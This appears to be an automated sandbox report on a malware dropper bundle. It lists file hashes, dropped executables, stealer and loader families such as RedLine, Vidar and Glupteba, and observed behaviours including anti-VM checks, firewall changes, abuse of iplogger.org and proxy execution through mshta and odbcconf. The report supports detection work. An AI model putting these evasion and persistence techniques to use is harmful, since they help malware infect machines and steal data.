| SHA256 | 2e66ee49034c57f050edeb0b1039c007b6ca07aa524d5515b0bf9ff9d3fb378b |
| SHA512 | ad47a9824ebfa7b0af5609f461491b4d1b4b679c32ed738787bddbec58fc74da48892f8e2e7210b15091988c80bb72537d3bb97f6fa8595be56ad0aa46ad5476 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 9cc20c533dccecc8e600f45907986e76 |
| SHA1 | 766bc9451da42e9c4d2a68a46f79ecc13d8322e5 |
| SHA256 | bb31802f2611feb0312df35aa84c8aea6d01db3637b0b472494e5c5248809430 |
| SHA512 | 69c38f55c5e7aec0f2d2bd458df714de69f273140a3b2a78781398c8cdeb745cbe32f54ab0bb92f8c330276132b6cee1a1b5d5004811deba52a649e70e2926f1 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 989d619ebcaeb387d0c8538f12d35e07 |
| SHA1 | 06828c94fb966d2b9036af3c1a3b0e0bb2649845 |
| SHA256 | e1673106830bb674d4e807d26fd15ec8d6b61deb7a1fcfe8d27f75a781001c13 |
| SHA512 | 7de14ff26fa76dc742b9cbc0d63a7b3c54ea85697280c3ba55592b8c06be59f1576e7d3647d504823002b082eebe05875bfb528b6fa9ddadc20434e37b9b7752 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC
| MD5 | e4a68ac854ac5242460afd72481b2a44 |
| SHA1 | df3c24f9bfd666761b268073fe06d1cc8d4f82a4 |
| SHA256 | cb3ccbb76031e5e0138f8dd39a23f9de47ffc35e43c1144cea27d46a5ab1cb5f |
| SHA512 | 5622207e1ba285f172756f6019af92ac808ed63286e24dfecc1e79873fb5d140f1ceb7133f2476e89a5f75f711f9813a9fbb8fd5287f64adfdcc53b864f9bdc5 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC
| MD5 | 63a9fb9b718f31ab8dcf99f3d73dad30 |
| SHA1 | eb5c142845307dbe959799d907e93660985c48b8 |
| SHA256 | f650d4d2ec9c7135520865a43143685bb8903d1798f6662413ffff82582868e5 |
| SHA512 | 745aefa70d2a6c2b0c25ecd3cf7d10cdef41bdfb8be73e5c38850a914be335c602dd69487719fbc1fdef777b1cd6e83ebd97c06263cf2809be6ca50460378826 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | edabef1164a5b276e7d15de9911c3425 |
| SHA1 | 2573444206a8b9ca0a587c32f51e223bbc0a3ec6 |
| SHA256 | 5541a5da6c1239974d52ba110fcdc363575db23289d036b1e5ecb9a85edaac99 |
| SHA512 | 9e6706a6f159336f46c225d09df305ff13bd6a2cba4e5a27c7c96fca73cf6206a159d7d27af0737998123c1f9ca45d1393d1514ea0c759cf5505e88bb4ea6811 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 9981bb7c2cd1588b4f7738e773bc83f7 |
| SHA1 | 1d641bb8b63e22f3f0c0f31a62b96bd32f68a689 |
| SHA256 | 019d11356337c97c9b271b497aecd10359c1d2b7167d33f4b8907fd10d4d179a |
| SHA512 | 0efea790ff9b78b3f1dd6d16467de470ceee7e64577c2e5b53d0a5a80c860f391125c44fbfeafdc9bf0b4543b0cd7b31cc29b462c1424ac54167b5220f4fff63 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 97ffb59017a8a2157cb4e11b06acce56 |
| SHA1 | b8ec77173739238b7673562c2bde1ba97f37a28a |
| SHA256 | 0b5256466b1244e73df35c10800795c3bb7f692d6494b08e4e831d86ee116395 |
| SHA512 | b3e1b6f8715c8b1378531694577f35a810d68549eced33465a35cd2e8dcf02eebba3c6f6b24495d2b8de8b1555ad8e3c63fd2286d9c024eae1aa0f85f6ebfd99 |
memory/2988-1529-0x0000000140000000-0x00000001405E8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
| MD5 | 1afff8d5352aecef2ecd47ffa02d7f7d |
| SHA1 | 8b115b84efdb3a1b87f750d35822b2609e665bef |
| SHA256 | c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1 |
| SHA512 | e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb |
memory/2988-1530-0x0000000140000000-0x00000001405E8000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROLMKJ86\suggestions[1].en-US
| MD5 | 5a34cb996293fde2cb7a4ac89587393a |
| SHA1 | 3c96c993500690d1a77873cd62bc639b3a10653f |
| SHA256 | c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad |
| SHA512 | e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee |
C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error
| MD5 | fd2727132edd0b59fa33733daa11d9ef |
| SHA1 | 63e36198d90c4c2b9b09dd6786b82aba5f03d29a |
| SHA256 | 3a72dbedc490773f90e241c8b3b839383a63ce36426a4f330a0f754b14b4d23e |
| SHA512 | 3e251be7d0e8db92d50092a4c4be3c74f42f3d564c72981f43a8e0fe06427513bfa0f67821a61a503a4f85741f0b150280389f8f4b4f01cdfd98edce5af29e6e |
C:\Users\Admin\AppData\Local\Temp\osloader.exe
| MD5 | e2f68dc7fbd6e0bf031ca3809a739346 |
| SHA1 | 9c35494898e65c8a62887f28e04c0359ab6f63f5 |
| SHA256 | b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4 |
| SHA512 | 26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579 |
C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error
| MD5 | fafbf2197151d5ce947872a4b0bcbe16 |
| SHA1 | a86eaa2dd9fc6d36fcfb41df7ead8d1166aea020 |
| SHA256 | feb122b7916a1e62a7a6ae8d25ea48a2efc86f6e6384f5526e18ffbfc5f5ff71 |
| SHA512 | acbd49a111704d001a4ae44d1a071d566452f92311c5c0099d57548eddc9b3393224792c602022df5c3dd19b0a1fb4eff965bf038c8783ae109336699f9d13f6 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-08 10:35
Reported
2024-11-08 10:38
Platform
win10v2004-20241007-en
Max time kernel
44s
Max time network
151s
Command Line
Signatures
Detect Fabookie payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Fabookie
Fabookie family
Glupteba
Glupteba family
Glupteba payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
NullMixer
Nullmixer family
PrivateLoader
Privateloader family
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
Socelars
Socelars family
Socelars payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Vidar
Vidar family
Detected Nirsoft tools
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun156aa32cae4a.exe | N/A |
NirSoft WebBrowserPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun156aa32cae4a.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun156aa32cae4a.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\h02CuYYeZUcMDD.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\85f5b66f8c0b9dd1838da31024190463ee565d0052f26bbfdaa84d12ed1163db.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\is-HFUCS.tmp\Sun15b94526a807b.tmp | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun156d9ca8467.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun157e7a96e632.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Q7J2UrO1XZC8DQK.EXe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun15a8461882.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun15635943177.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Q7J2UrO1XZC8DQK.EXe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-HFUCS.tmp\Sun15b94526a807b.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-P4VBJ.tmp\Sun15b94526a807b.tmp | N/A |
| N/A | N/A | C:\Windows\SysWOW64\odbcconf.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\odbcconf.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\odbcconf.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\odbcconf.exe | N/A |
Reads user/profile data of web browsers
System Binary Proxy Execution: Odbcconf
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\odbcconf.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\odbcconf.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\odbcconf.exe | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun156aa32cae4a.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun1515dbfc0edab0.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun15c4c762b69ba5.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun15b94526a807b.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun156d9ca8467.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun157e7a96e632.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Q7J2UrO1XZC8DQK.EXe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\11111.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun1585e1028b0.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun15372e8db79ed3d.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun1524d92394d.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\odbcconf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-P4VBJ.tmp\Sun15b94526a807b.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun154ca5fada.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun157e7a96e632.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun15a8461882.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\h02CuYYeZUcMDD.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Q7J2UrO1XZC8DQK.EXe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun15e81af69f990d3a6.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\odbcconf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\85f5b66f8c0b9dd1838da31024190463ee565d0052f26bbfdaa84d12ed1163db.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun15c4c762b69ba5.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun15c4c762b69ba5.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun15c4c762b69ba5.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun1515dbfc0edab0.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun1515dbfc0edab0.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun1580e9cd8c23e.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun15168f90478cc7.exe | N/A |
